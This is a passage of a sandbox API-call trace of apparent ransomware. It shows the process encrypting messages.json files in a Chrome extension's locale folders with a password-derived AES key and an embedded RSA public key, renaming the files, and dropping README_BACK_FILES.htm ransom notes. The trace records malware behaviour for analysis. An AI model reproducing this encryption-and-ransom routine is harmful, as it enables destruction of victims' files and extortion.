GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.748] GetLastError () returned 0x0 [0251.749] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json")) returned 0x20 [0251.749] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0251.750] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.750] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.753] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.753] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989fb8) returned 1 [0251.756] CryptCreateHash (in: hProv=0x2989fb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.756] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.756] CryptHashData (hHash=0x2984420, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.756] CryptDeriveKey (in: hProv=0x2989fb8, Algid=0x6610, hBaseData=0x2984420, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29841a0) returned 1 [0251.756] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.756] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.756] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989af0) returned 1 [0251.757] CryptImportPublicKeyInfo (in: hCryptProv=0x2989af0, dwCertEncodingType=0x1, pInfo=0x29913f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991420*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991428*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984360) returned 1 [0251.757] CryptEncrypt (in: hKey=0x2984360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.757] CryptEncrypt (in: hKey=0x2984360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989c00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989c00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.757] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2989c00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989c00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.758] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.759] CryptEncrypt (in: hKey=0x29841a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.760] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.760] CloseHandle (hObject=0x5d64) returned 1 [0251.760] CloseHandle (hObject=0x5d5c) returned 1 [0251.760] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0251.763] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0251.764] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0251.765] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0251.766] CryptDestroyHash (hHash=0x2984420) returned 1 [0251.766] CryptDestroyKey (hKey=0x29841a0) returned 1 [0251.766] CryptReleaseContext (hProv=0x2989fb8, dwFlags=0x0) returned 1 [0251.766] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.766] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.767] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0251.767] AreFileApisANSI () returned 1 [0251.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.767] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.767] GetFileType (hFile=0x5d60) returned 0x1 [0251.768] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.769] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.769] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.769] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.769] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.769] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.769] GetLastError () returned 0x0 [0251.770] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json")) returned 0x20 [0251.770] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0251.771] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.772] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.773] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.773] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989c88) returned 1 [0251.776] CryptCreateHash (in: hProv=0x2989c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.776] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.776] CryptHashData (hHash=0x2984120, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.776] CryptDeriveKey (in: hProv=0x2989c88, Algid=0x6610, hBaseData=0x2984120, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984560) returned 1 [0251.776] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.776] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.776] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989d10) returned 1 [0251.776] CryptImportPublicKeyInfo (in: hCryptProv=0x2989d10, dwCertEncodingType=0x1, pInfo=0x2991ce0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991d10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991d18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29840e0) returned 1 [0251.776] CryptEncrypt (in: hKey=0x29840e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.777] CryptEncrypt (in: hKey=0x29840e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989d98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989d98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.777] WriteFile (in: hFile=0x5d64, lpBuffer=0x2989d98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989d98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.778] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.779] CryptEncrypt (in: hKey=0x2984560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.779] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.779] CloseHandle (hObject=0x5d5c) returned 1 [0251.779] CloseHandle (hObject=0x5d64) returned 1 [0251.779] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0251.783] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0251.783] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0251.785] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0251.786] CryptDestroyHash (hHash=0x2984120) returned 1 [0251.786] CryptDestroyKey (hKey=0x2984560) returned 1 [0251.786] CryptReleaseContext (hProv=0x2989c88, dwFlags=0x0) returned 1 [0251.786] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.786] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.786] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0251.786] AreFileApisANSI () returned 1 [0251.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.787] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.787] GetFileType (hFile=0x5d60) returned 0x1 [0251.788] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.789] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.789] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.790] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.790] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.790] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.790] GetLastError () returned 0x0 [0251.790] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json")) returned 0x20 [0251.791] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0251.792] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.792] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.793] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.793] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989c88) returned 1 [0251.796] CryptCreateHash (in: hProv=0x2989c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.796] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.796] CryptHashData (hHash=0x29841a0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.796] CryptDeriveKey (in: hProv=0x2989c88, Algid=0x6610, hBaseData=0x29841a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984260) returned 1 [0251.796] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, 